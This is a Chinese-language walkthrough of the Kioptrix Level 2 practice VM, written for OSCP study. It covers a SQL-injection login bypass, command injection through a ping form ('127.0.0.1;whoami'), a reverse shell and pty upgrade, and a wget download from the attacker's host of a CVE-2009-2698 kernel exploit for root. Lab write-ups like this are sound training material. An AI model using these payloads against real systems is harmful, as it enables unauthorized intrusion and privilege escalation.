oscp學習之路，Kioptix Level2靶場通關教程

靶場下載：Kioptrix Level 2.zip

鏈接: https://pan.baidu.com/s/1gxVRhrzLW1oI_MhcfWPn0w?pwd=1111 提取碼: 1111

搭建好靶場之后輸入ip a看一下攻擊機的IP。

確定好本機IP后，使用nmap掃描網段，

nmap 192.168.0.1/24

掃描發現靶機，靶機IP為192.168.0.106，開放端口為22、80、111、443、631、3306，訪問頁面端進行查看

一個登錄框，掃描一下目錄看看

訪問后是一個apache的說明，唯一的信息就是apache的版本信息了，在次回到登錄的原始頁面，先拿弱口令和萬能密碼試試，使用**<font style="color:rgb(64, 64, 64);background-color:rgb(236, 236, 236);">admin' OR '1'='1/admin</font>**萬能密碼成功登錄

看起來頁面少了輸入的表格，查看一下源代碼，

發現在源代碼中代碼有誤導致其沒有顯示出來——center后面少一個'，并且表單數據將被發送到 <font style="color:rgb(64, 64, 64);">pingit.php</font> 文件進行處理，處理結果將在新標簽頁中顯示。進入編輯模式，復制粘貼對其進行修改補全。

				<td align='center'><input type="text" name="ip" size="30"><input type="submit" value="submit" name="submit"></td></td>

修改完成后成功出現輸入框和提交按鈕。

輸入127.0.0.1試試。

通過在后面銜接命令查看是否執行，輸入127.0.0.1;whoami，提交后效果如圖：

既然whoami可以執行，那么我們也可以通過寫一個反彈shell來獲取shell，成功彈回，

此時還不是交互式shell，通過**<font style="color:rgb(64, 64, 64);background-color:rgb(236, 236, 236);">python -c 'import pty; pty.spawn("/bin/bash")'</font>**指令構造偽終端。

接下來就該提權，查看一下系統的版本看是否存在漏洞

bash-3.00$ uname -a
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.00$ lsb_release -a
lsb_release -a
LSB Version:    :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description:    CentOS release 4.5 (Final)
Release:        4.5
Codename:       Final

CentOS系統** 4.5，內核版本為 2.6.9-55.EL**，很古老的版本了，網上查一下漏洞，這里使用的是[CVE-2009-2698](https://github.com/xiaoxiaoleo/CVE-2009-2698)下載exp，在本地使用python http.server 5555 啟動一個http的服務

在靶機上進行下載，第一次下載的時候失敗，發現是沒有寫入權限，切換到tmp目錄下再次使用wget http://192.168.0109:5555/exp進行下載

成功下載，加權進行執行

運行后輸入whoami發現成功提權，完成通關！